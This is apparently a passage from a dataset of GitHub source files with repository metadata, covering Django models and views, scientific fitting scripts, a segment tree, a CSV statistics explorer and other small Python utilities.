print FMT % ("MRR", avg_mrr_se, std_mrr_se, avg_mrr_svm, std_mrr_svm, avg_abs_impr_mrr, std_abs_impr_mrr, avg_rel_impr_mrr, std_rel_impr_mrr)
print FMT % ("MAP", avg_map_se, std_map_se, avg_map_svm, std_map_svm, avg_abs_impr_map, std_abs_impr_map, avg_rel_impr_map, std_rel_impr_map)
print FMT % ("P@1", avg_rec1_se, std_rec1_se, avg_rec1_svm, std_rec1_svm, avg_abs_impr_rec1, std_abs_impr_rec1, avg_rel_impr_rec1, std_rel_impr_rec1)
#print ORACLE_FMT % (oracle_avg_mrr, std_oracle_avg_mrr, oracle_avg_map, std_oracle_avg_map, oracle_avg_rec1, std_oracle_avg_rec1)
# print "Averaged absolute improvement"
# print "MRRof1: %6.2f%%" % abs_mrr_impr
# print "RECof1: %6.2f%%" % abs_recall_impr
# print "Averaged relative improvement"
# print "MRRof1: %6.2f%%" % rel_mrr_impr
# print "RECof1: %6.2f%%" % rel_recall_impr
def mean_and_std(values):
"""Compute mean standard deviation"""
size = len(values)
mean = sum(values)/size
s = 0.0
for v in values:
s += (v - mean)**2
std = math.sqrt((1.0/(size-1)) * s)
return mean, std
def main():
usage = "usage: %prog [options] arg1 [arg2]"
desc = """arg1: file with the output of the baseline search engine (ex: svm.test.res)
arg2: predictions file from svm (ex: train.predictions)
if arg2 is ommited only the search engine is evaluated"""
parser = OptionParser(usage=usage, description=desc)
parser.add_option("-t", "--threshold", dest="th", default=15, type=int,
help="supply a value for computing Precision up to a given threshold "
"[default: %default]", metavar="VALUE")
parser.add_option("-f", "--format", dest="format", default="trec",
help="format of the result file (trec, answerbag): [default: %default]",
metavar="VALUE")
parser.add_option("-v", "--verbose", dest="verbose", default=False, action="store_true",
help="produce verbose output [default: %default]")
(options, args) = parser.parse_args()
if len(args) == 1:
path = args[0]
stats_cv(path=path, format=options.format, th=options.th)
else:
parser.print_help()
sys.exit(1)
if __name__ == '__main__':
main()
| [
"fellin.roberto@hotmail.it"
] | fellin.roberto@hotmail.it |
5b3762c02c7c7b4b4f9facb6cac52f2b636c4428 | d2160e6de585d75ec42b1cd861340c3d78610984 | /BillChop/chop/migrations/0007_receipt_image.py | 3e55297ef9c209879adfd97392efb25a3cedf90e | [] | no_license | singichs/BillChop | 8eabacd9ea9e02766947592c640489f486329952 | b726fde5beb421e41cb23c060f618aa5bc84ad56 | refs/heads/master | 2020-04-09T06:18:46.812438 | 2018-12-02T23:37:37 | 2018-12-02T23:37:37 | 160,106,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 484 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-11-11 07:35
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('chop', '0006_auto_20171108_1611'),
]
operations = [
migrations.AddField(
model_name='receipt',
name='image',
field=models.ImageField(blank=True, null=True, upload_to='receipt_images/'),
),
]
| [
"jmkunnat@umich.edu"
] | jmkunnat@umich.edu |
2927f00d5c0dc243e901c6ece4b6bfb68541df6d | bd51254da13c09bb60b216280788acc89926e89a | /analytics/EtaCar/Hepsilon/GMOS/fit_gmos_hepsilon.py | 59cf31edede8af31ccbc0c3304ba3c5ddd42e581 | [] | no_license | DavoGrant/SpectralDynamics | d52257699a08fa599966a85b22c9c3c2d87224a0 | 9304794b2b22242bfa6ba70bc50f88eae19ea3ff | refs/heads/master | 2023-08-08T15:45:33.802822 | 2022-06-22T08:21:43 | 2022-06-22T08:21:43 | 215,364,235 | 0 | 0 | null | 2022-06-22T01:20:23 | 2019-10-15T18:03:08 | Python | UTF-8 | Python | false | false | 2,500 | py | import sqlite3
import pandas as pd
from config import RESULTS_PATH, DB_PATH
from extract.core.spectra import SpectralHandler
from extract.core.lines import SpectralFits
from extract.observatories.gemini import GeminiTelescopeInstruments
from extract.features.etacar_library import etacar_templates
from extract.helpers import fetch_bad_jds
# Initialise dataset from disk.
handler = SpectralHandler()
handler.select_fits_dataset(
dataset_path=RESULTS_PATH, datastream='GMOS',
data_release='Archival', target='EtaCar', dimension='2D')
# Fitting config.
concat_table = 'Hepsilon_RegimeConcat2'
jd_tuples = [{'label': 'constant-1', 'template': 'Harvard_GMOS_C1',
'solver': 'CF', 'jd_rule': (2454907.778, 'before')},
{'label': 'constant-2', 'template': 'Harvard_GMOS_C2',
'solver': 'CF', 'jd_rule': (2454907.778, 'after')},
{'label': 'benchmark', 'template': 'BHM',
'solver': 'BHM', 'jd_rule': (None, 'exact')}]
# Iterate different fitting regimes.
res_tables = []
for regime in jd_tuples:
print('\nStarting new fitting regime={}\n'.format(regime['label']))
# Select subset of the dataset.
handler.select_fits_subset(
pre_processing=None, binning=None, exposure=(None, 'max'),
reduction=None, observatory=None, jd=regime['jd_rule'])
# Define fitting routines.
fitter = SpectralFits(GeminiTelescopeInstruments.gmos)
fitter.add(etacar_templates.h_i_3970(version=regime['template'],
solver=regime['solver']))
# Ready fitting routine and pre-processing options.
fitter.compile(helio_correction=False, continuum_normalisation=True,
re_bin=None, refine_continuum=True,
bad_jds=fetch_bad_jds(db_path=DB_PATH,
fit='h_epsilon_master',
comp='Any'))
# Execute fitting routines.
fitter.fit(handler.data_subset, diagnostics=False, draw=False, db_path=DB_PATH)
# Store consecutive regimes.
if not regime['label'] == 'benchmark':
res_tables.extend(fitter.table_names)
# Join regimes.
print('Collating fits into table={}'.format(concat_table))
connection = sqlite3.connect(DB_PATH)
for t in res_tables:
query = 'SELECT * FROM {} '.format(t)
data_table = pd.read_sql_query(query, connection)
data_table.to_sql(concat_table, connection, if_exists='append', index=False)
connection.close()
| [
"david.grant@physics.ox.ac.uk"
] | david.grant@physics.ox.ac.uk |
33f57616db70a4b29866938453f716978cba239a | ea12f060702af72a7a408d83b67424579a9215e0 | /pet.py | 8d973ae8402d9adb05984dac802c52aaccdf27ab | [] | no_license | kenanAlhindi97/b-ignited-python | 4e4b24dd15ad9a519145f0edb728d219ace1bc79 | dc164d71df87048dd45f96827638b6b4642b7542 | refs/heads/master | 2023-08-25T21:56:26.994111 | 2021-10-04T11:01:42 | 2021-10-04T11:01:42 | 413,389,274 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 867 | py | class Tag:
def __init__(self, tag_id, tag_name):
self.tag_name = tag_name
self.tag_id = tag_id
def to_json(self):
return {
"id": self.tag_id,
"name": self.tag_name
}
class Pet:
def __init__(self, name, pet_id, category, cat_id, image_urls, status, tags):
self.name = name
self.pet_id = pet_id
self.category = category
self.cat_id = cat_id
self.image_urls = image_urls
self.status = status
self.tags = tags
def to_json(self):
return {
"id": self.pet_id,
"name": self.name,
"category": {
"id": self.cat_id,
"name": self.category
},
"photoUrls": self.image_urls,
"tags": self.tags,
"status": self.status
}
| [
"alhinke@cronos.be"
] | alhinke@cronos.be |
be3d4de077db43c7cf8777d1fc655106e6be15a2 | fab208825764bd6b50b8198a364ea04521b70566 | /ticketing/migrations/0002_cinema.py | dbfe651f36348b29ef6f202b278b79b5c5bf3c0d | [] | no_license | iam-Robo/DjangoCourse | 69bb2bf9fe6582b94ebf1fefccf0321a544183bc | 0842c966048b773ae0a177f6acf1887e22b2a5ef | refs/heads/master | 2023-08-26T12:09:31.655701 | 2021-10-23T06:54:55 | 2021-10-23T06:54:55 | 370,765,396 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 732 | py | # Generated by Django 3.2.3 on 2021-05-26 07:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ticketing', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Cinema',
fields=[
('cinema_code', models.IntegerField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=50)),
('city', models.CharField(default='تهران', max_length=30)),
('capacity', models.IntegerField()),
('phone', models.CharField(max_length=20, null=True)),
('address', models.TextField()),
],
),
]
| [
"a.abizadeh@gmail.com"
] | a.abizadeh@gmail.com |
8c9831cf023007d0c71f173fc3e83ba0fd0dfc19 | 7d19af9fbaf3bdb07cadb05c17fa5b6ee61e3062 | /devel/py-editorconfig-core/patches/patch-setup.py | a5b21c51aeed7ea9288740b110be13bfd9ccb375 | [] | no_license | jrmarino/pkgsrc-synth | ff96437a20953c832777a70b9ad298229154fa35 | dc200e5f34878e8b3d57d4a5c321077c79b42ec7 | refs/heads/master | 2022-06-07T17:08:57.130400 | 2022-05-01T00:22:20 | 2022-05-01T00:22:20 | 71,819,061 | 3 | 3 | null | null | null | null | UTF-8 | Python | false | false | 788 | py | $NetBSD: patch-setup.py,v 1.2 2018/08/15 11:23:08 adam Exp $
* remove non-versioned file. The console command for editorconfig-core
is in the editorconfig-core package. Removing this file removes the
conflict that this package would have with the editorconfig-core
package.
--- setup.py.orig 2018-04-17 03:59:54.000000000 +0000
+++ setup.py
@@ -11,11 +11,6 @@ setup(
license='python',
description='EditorConfig File Locator and Interpreter for Python',
long_description=open('README.rst').read(),
- entry_points = {
- 'console_scripts': [
- 'editorconfig = editorconfig.main:main',
- ]
- },
classifiers=[
'License :: OSI Approved :: Python Software Foundation License',
'Operating System :: OS Independent',
| [
"dragonflybsd@marino.st"
] | dragonflybsd@marino.st |
e657bcfe649192e8afa5b0080dfb8e538965f618 | b4dea670701c4964af80eefe0e251bf9b3770c45 | /test.py | b3d5377c83b4b97dd6d408d5d33eb35a6a0d1b61 | [] | no_license | zohaibjan/Ensemble_PSO_Python_V1 | 54a3c85d26c07e78f529245d5ceb4e556ed92cfe | 1f06f72ba1156cbb930fa3be9d596944cb375d99 | refs/heads/master | 2020-11-24T10:27:03.380254 | 2020-11-02T11:30:43 | 2020-11-02T11:30:43 | 228,107,167 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 532 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Dec 4 12:12:00 2019
@author: janz
"""
from mainProgram import mainProgram
import numpy as np
import csv
data = {'thyroid','wine','diabetes',\
'segment', 'ecoli','cancer',\
'vehicle','iris','liver','ionosphere',\
'sonar','glass'}
numOfRuns = 10
file = open("results.csv", mode="a")
results = csv.writer(file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
results.writerow(["Data set", "Accuracy without optimization","Accuracy with optimization"])
file.close();
| [
"zohaibjan@zohaibs-MacBook-Pro.local"
] | zohaibjan@zohaibs-MacBook-Pro.local |
7a895befdacc4f2f0ea72dc5eec7438bc6eb2c5a | eab04e0cf3b51840de0c446da352d9c70ef7942a | /NPTEL Course/Concept Practices/prime.py | 32b8b878f5f74df4e30818c2ccb63cf3971269bc | [] | no_license | yashgugale/Python-Programming-Data-Structures-and-Algorithms | eb2a49291440a29de98031de87208404350f9386 | 8d2b57e72ebac1f063b40b6c1f69683ade8703eb | refs/heads/master | 2021-08-08T05:59:31.628803 | 2017-11-09T17:30:09 | 2017-11-09T17:30:09 | 105,263,545 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def isprime(n):
factors = []
if n == 1:
print("1 is neither prime nor composite")
for i in range(2,n+1):
if n%i == 0:
factors.append(i)
if len(factors) > 2:
print(n," is a composite number")
else:
print(n," is a prime number")
#isprime(5)
"""
def isprime(n):
return(factors(n) == [1,n])
ie if the factors of n are 1 and the number itself, then return that the number
is a prime number
"""
| [
"yashgugale@bitbucket.org"
] | yashgugale@bitbucket.org |
047851a7765a38405e92e6524f7a6cba7247af3b | 6750596d7bfbc192c5d2e706a05cb2163923b2e2 | /range-min-py/rangemin.py | a517af99f84659fe3cef8b5306bbaf88cd02f38a | [] | no_license | ak-19/segment-tree | b284c1b795604eb53ebda5f39322a7b8abe4fab8 | 9b06f2e83e1940fa7b79f44502e25ab9e2d8b725 | refs/heads/master | 2022-08-24T15:48:22.623939 | 2022-07-19T12:20:45 | 2022-07-19T12:20:45 | 173,442,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 848 | py | from math import inf
class MinSegementTree:
def __init__(self, A):
self.N = len(A)
self.A = [0] * self.N + A
for i in range(self.N-1, -1, -1):
self.A[i] = min(self.A[i * 2], self.A[i * 2 + 1])
def update(self, index, val):
index += self.N
self.A[index] = val
index //= 2
while index > 1:
self.A[index] = min(self.A[index], val)
index //= 2
def min(self, L, R):
L += self.N
R += self.N
result = inf
while L <= R:
if L % 2 == 1:
result = min(result, self.A[L])
L += 1
if R % 2 == 0:
result = min(result, self.A[R])
R -= 1
L //= 2
R //= 2
return result
| [
"ante.kotarac@gmail.com"
] | ante.kotarac@gmail.com |
c8d875090e511a64be18c1beef7a7dbfdf199d4e | 10d7e5ae233518fc81c84d14dc83322d17ad04a9 | /apps/courses/views.py | 8e237e990223ef829132a05661c4b8178d959322 | [] | no_license | zonggeng/Mxonline3 | 815e88ea4df681e45e9588cf1f91160b75bb2c89 | 0dd3f11d7ba0060e2c696406235603608e90293a | refs/heads/master | 2021-05-08T16:09:03.694267 | 2018-02-07T04:25:49 | 2018-02-07T04:25:49 | 120,145,416 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,023 | py | from django.db.models import Q
from django.shortcuts import render
from pure_pagination import Paginator, EmptyPage, PageNotAnInteger
# Create your views here.
from django.views.generic.base import View
from courses.models import Course
from operation.models import UserFavorite
class CourseListView(View):
def get(self, request):
all_course = Course.objects.all()
# 热门课程推荐
hot_courses = Course.objects.all().order_by("-students")[:3]
# 搜索功能
search_keywords = request.GET.get('keywords', '')
if search_keywords:
# 在name字段进行操作,做like语句的操作。i代表不区分大小写
# or操作使用Q
all_course = all_course.filter(Q(name__icontains=search_keywords) | Q(desc__icontains=search_keywords) | Q(
detail__icontains=search_keywords))
# 对课程进行分页
# 尝试获取前台get请求传递过来的page参数
# 如果是不合法的配置参数默认返回第一页
# 进行排序
sort = request.GET.get('sort', "")
if sort:
if sort == "students":
all_course = all_course.order_by("-students")
elif sort == "hot":
all_course = all_course.order_by("-click_nums")
try:
page = request.GET.get('page', 1)
except PageNotAnInteger:
page = 1
# 这里指从allorg中取五个出来,每页显示5个
p = Paginator(all_course, 6, request=request)
courses = p.page(page)
return render(request, "course-list.html", {
"all_course": courses,
"sort": sort,
"hot_courses": hot_courses,
"search_keywords": search_keywords
})
# 课程详情处理view
class CourseDetailView(View):
def get(self, request, course_id):
# 此处的id为表默认为我们添加的值。
course = Course.objects.get(id=int(course_id))
# 增加课程点击数
course.click_nums += 1
course.save()
# 是否收藏课程
has_fav_course = False
has_fav_org = False
# 必须是用户已登录我们才需要判断。
if request.user.is_authenticated:
if UserFavorite.objects.filter(user=request.user, fav_id=course.id, fav_type=1):
has_fav_course = True
if UserFavorite.objects.filter(user=request.user, fav_id=course.course_org_id, fav_type=2):
has_fav_org = True
# 取出标签找到标签相同的course
tag = course.tag
if tag:
# 从1开始否则会推荐自己
relate_courses = Course.objects.filter(tag=tag)[1:2]
else:
relate_courses = []
return render(request, "course-detail.html", {
"course": course,
"relate_courses": relate_courses,
"has_fav_course": has_fav_course,
"has_fav_org": has_fav_org,
})
| [
"137100856@163.com"
] | 137100856@163.com |
258533bb62c69333a94d9d963a951015171969f8 | 19eb9945c3b11eef9b5792f85218a7a62a8aa17e | /explore.py | dd21c31197a74ccc4b0013dea08a3d15f36cb424 | [
"Apache-2.0"
] | permissive | SLIPO-EU/poi-data-exploration | 659ff452132ad131657e5ed66f41e092ce082936 | 4d11a14423a5b68c56da4131e67ff36e11dabe16 | refs/heads/master | 2020-03-21T08:00:04.349687 | 2018-08-30T09:21:37 | 2018-08-30T09:21:37 | 138,313,171 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,902 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Feb 20 11:27:34 2018
@author: Pantelis Mitropoulos
"""
import pandas as pd
import re
import json
from statistics import *
import sys
import time
class StatsWrapper(object):
"""
Collection of tools for statistics wrapper.
"""
errors = []
status = 1
def get_valid_filename(self, s):
"""
A simple method to construct valid filenames.
"""
s = str(s).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
def reduceOther(self, data):
"""
A method to collect all categories with values below a threshold into a unique category named 'other'.
"""
total = data.value.sum()
limit = int(round(0.04*total, 0))
x_list = data.query('value >= ' + str(limit))
below_limit = data.query('value < ' + str(limit))
below_count = below_limit['name'].count()
if below_count > 0:
label = 'other (' + str(below_count) + ')' if below_count > 1 else below_limit.iloc[0]['name']
new = pd.DataFrame([[label, below_limit['value'].sum()]], columns=['name', 'value'])
x_list = x_list.append(new)
return x_list
def extractArgs(self, argv):
"""
A method to extract arguments, validate them, and write corresponding messages.
"""
args = {}
for arg in argv:
key = arg.split('=')[0]
if key not in [argv[0], 'filename', 'column', 'category', 'chart_type', 'delimiter']:
self.errors.append('Unknown option: ' + key)
elif key != 'eval.py':
args[key] = arg
try:
filename = args['filename'].split('=')[1]
except:
self.errors.append('Filename should be supplied')
self.status = 0
if (self.status == 1):
try:
delimiter = args['delimiter'].split('=')[1]
except:
delimiter = ','
try:
column = args['column'].split('=')[1]
except:
column = False
try:
category = args['category'].split('=')[1]
except:
category = 'generic' if column not in ['name', 'address', 'cost', 'schedule', 'phone', 'rating'] else column
try:
chart_type = args['chart_type'].split('=')[1]
except:
chart_type = 'bar' if column in ['categorical', 'schedule', 'category', 'rating', 'cost'] else 'pie'
self.args = {'filename': filename, 'column': column, 'category': category, 'chart_type': chart_type, 'delimiter': delimiter}
return self.args
def readCSV(self, args):
"""
A method to read a csv file and check for a column existence.
"""
try:
self.df = pd.read_csv(args['filename'], encoding='utf-8', delimiter=args['delimiter'], low_memory=False, engine='c')
self.shape = self.df.shape
self.headers = list(self.df)
if args['column'] != False and args['column'] not in self.headers:
self.errors.append('Column ' + args['column'] + ' not found in ' + args['filename'])
args['column'] = False
except FileNotFoundError:
self.errors.append('File not found!')
self.status = 0
def generalStats(self, dataframe, columns):
"""
A method to extract distinct values of a field.
"""
children = []
for column in columns:
col = self.df[column]
col = col.astype('str')
col = col.str.split("|").apply(pd.Series).stack().reset_index(drop=True)
col = col.str.strip()
distinct = col.value_counts()
distinct = distinct.to_frame()
distinct.columns = ['value']
distinct.index.name = 'name'
distinct = distinct.reset_index()
distinct = distinct.to_dict('records')
child = {"name": column}
if float(len(distinct)) <= 30:
child["children"] = distinct
children.append(child)
return children
def prepare(self, col):
"""
Prepare column in case of string data.
"""
if (col.dtype == 'object'):
col = col.str.split("|").apply(pd.Series).stack().reset_index(drop=True)
col = col.str.strip()
return col
def describe(self, col):
"""
Enhanced description based on pandas describe.
"""
isnull = col.isnull().value_counts()
try:
null = isnull[True]
except:
null = 0
if (col.dtype == 'object'):
length = col.apply(str).map(len)
minimum = length.min()
maximum = length.max()
desc = col.describe()
if desc["freq"] < 3:
del desc["freq"]
del desc["top"]
desc["null"] = null
desc["minimum length"] = minimum
desc["maximum length"] = maximum
else:
desc = col.describe()
desc["null"] = null
for key, value in desc.iteritems():
try:
desc[key] = int(value)
except:
try:
desc[key] = float(value)
except:
pass
return desc
def clear(self):
del self.df
return
"""
Main ...
"""
if __name__ == "__main__":
start_time = time.time()
wrapper = StatsWrapper()
args = wrapper.extractArgs(sys.argv)
if (wrapper.status == 1):
wrapper.readCSV(args)
# end_time = time.time()
# print("--- %s seconds ---" % (end_time - start_time))
# exit()
column = args['column']
category = args['category']
chart_type = args['chart_type']
general = {
'status': wrapper.status,
'filename': args['filename'],
'rows': wrapper.shape[0],
'columns': wrapper.shape[1],
'headers': wrapper.headers,
'errors': wrapper.errors
} if len(wrapper.errors)==0 else {
'status': wrapper.status,
'errors': wrapper.errors
}
if general['status'] == 1:
# start_time = time.time()
if column == False:
unique = {"name": args['filename']}
unique["children"] = wrapper.generalStats(wrapper.df, wrapper.headers)
data = {"general": general, "list": wrapper.headers, "unique": unique}
end_time = time.time()
with open('./output/' + 'data.json', 'w') as fp:
json.dump(data, fp, ensure_ascii=False, indent=2)
else:
specific_data = pd.DataFrame()
col = wrapper.df[column]
wrapper.clear();
print('Memory cleared')
col = wrapper.prepare(col)
specific_data["description"] = wrapper.describe(col)
specific_data = specific_data.to_dict()
if category == 'categorical':
stats = Categorical(col, chart_type)
stats.reduceOther(stats.chart)
elif category == 'schedule':
stats = Schedule(col, chart_type)
elif category == 'name':
stats = Name(col, chart_type)
stats.reduceOther(stats.chart)
elif category == 'cost':
stats = PriceRange(col, chart_type)
elif category == 'address':
stats = Address(col, chart_type)
print(stats.chart)
elif category == 'phone':
stats = PhoneNumber(col, chart_type)
elif category == 'rating':
stats = Ratings(col, chart_type)
stats.reduceOther(stats.chart)
else:
category = 'generic'
stats = RegexStats(col, chart_type)
stats.reduceOther(stats.chart)
specific_data[category] = stats.chart
end_time = time.time()
json_filename = wrapper.get_valid_filename(column + ".json")
with open('./output/' + json_filename, 'w') as fp:
json.dump(specific_data, fp, ensure_ascii=False, indent=2)
print("--- %s seconds ---" % (end_time - start_time))
else:
with open('./output/' + 'data.json', 'w') as fp:
json.dump(general, fp, ensure_ascii=False, indent=2) | [
"noreply@github.com"
] | noreply@github.com |
26072b403ea326c1d2d2ddda786ce2b7b13952b8 | 431facece670577819a32d5e638db8dc3350683f | /CCW/test.py | 0d082665fc62f305e3b7619a03a8314949d41dca | [] | no_license | mateoglzc/CodechellaProject | 59e2e393236442cc5536ef4a0c046e490ff37700 | 43a1dea0bd123fd5666ff762d089b5af0d07dc98 | refs/heads/master | 2023-01-18T23:17:11.625963 | 2020-11-22T04:46:28 | 2020-11-22T04:46:28 | 314,722,765 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | from Naked.toolshed.shell import execute_js, muterun_js
def RunNodeScript():
from Naked.toolshed.shell import execute_js, muterun_js
result = execute_js('CCW/static/JS/getTweetLocations.js')
if result:
print('Succesfull')
else:
print('Unsuccesfull')
| [
"mateoglzc@hotmail.com"
] | mateoglzc@hotmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.